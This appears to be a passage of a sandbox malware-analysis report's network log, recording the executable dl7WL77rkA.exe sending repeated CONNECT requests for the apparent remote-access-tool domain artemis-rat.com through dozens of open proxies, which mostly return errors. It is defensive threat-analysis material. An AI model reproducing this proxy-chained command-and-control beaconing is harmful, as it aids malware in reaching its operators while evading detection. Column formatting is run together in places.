Expires: Mon, 11 Mar 2024 02:30:38 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            563192.168.2.55161459.6.26.121803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.705161095 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.016673088 CET | 166 | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            564192.168.2.55157854.233.119.17231283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.709794998 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.033909082 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:39 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            565192.168.2.551772104.16.106.234803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.710649014 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.864897013 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
566 | 192.168.2.5 | 51774 | 104.17.50.45 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.711100101 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.865458012 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
567 | 192.168.2.5 | 50700 | 174.138.94.117 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.711786032 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:06.333091021 CET | 806 | IN | HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Mar 11, 2024 03:31:07.520730972 CET | 806 | IN | HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Mar 11, 2024 03:31:08.896740913 CET | 806 | IN | HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Mar 11, 2024 03:31:11.712693930 CET | 806 | IN | HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Mar 11, 2024 03:31:17.344930887 CET | 806 | IN | HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Mar 11, 2024 03:31:28.352719069 CET | 806 | IN | HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Mar 11, 2024 03:31:52.160672903 CET  806  IN  HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
568192.168.2.55155045.11.95.16560123876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.714649916 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
569192.168.2.55168472.210.252.134461643876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.723098993 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
570192.168.2.550484103.180.240.4410803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.729785919 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
571192.168.2.55064391.142.222.84122663876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.733150005 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
572192.168.2.55176038.162.17.12131283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.770910025 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.203895092 CET  111  IN  HTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
573192.168.2.55167131.223.184.143803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.771337986 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.115190029 CET  316  IN  HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
574192.168.2.550741162.241.6.97412743876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.771435022 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
575192.168.2.551773162.214.197.102420193876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:39.771532059 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.295545101 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            576192.168.2.55163841.111.243.18803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.771532059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.086280107 CET495INHTTP/1.1 502 Proxy Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:29:48 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 348
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>DNS lookup failure for: artemis-rat.com</strong></p></p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            577192.168.2.55162193.87.49.8680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.771687031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.498600960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.702049971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.811767101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.202137947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            578192.168.2.5516355.252.23.22010813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.774720907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            579192.168.2.55163943.133.71.20156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.969276905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            580192.168.2.551624146.190.85.7931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.969731092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.320557117 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                                                                                                                                                                                            Server: squid/4.6
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3773
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_DNS_FAIL 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2019 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            581192.168.2.551681158.255.215.5090053876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.969873905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.284962893 CET339INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/4.7
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 5
                                                                                                                                                                                                                                                            X-Squid-Error: TCP_RESET 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from proxy.wakoopa.com
                                                                                                                                                                                                                                                            Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 72 65 73 65 74
                                                                                                                                                                                                                                                            Data Ascii: reset


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            582192.168.2.55165992.205.61.38292493876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.969942093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.686068058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.702460051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.811677933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
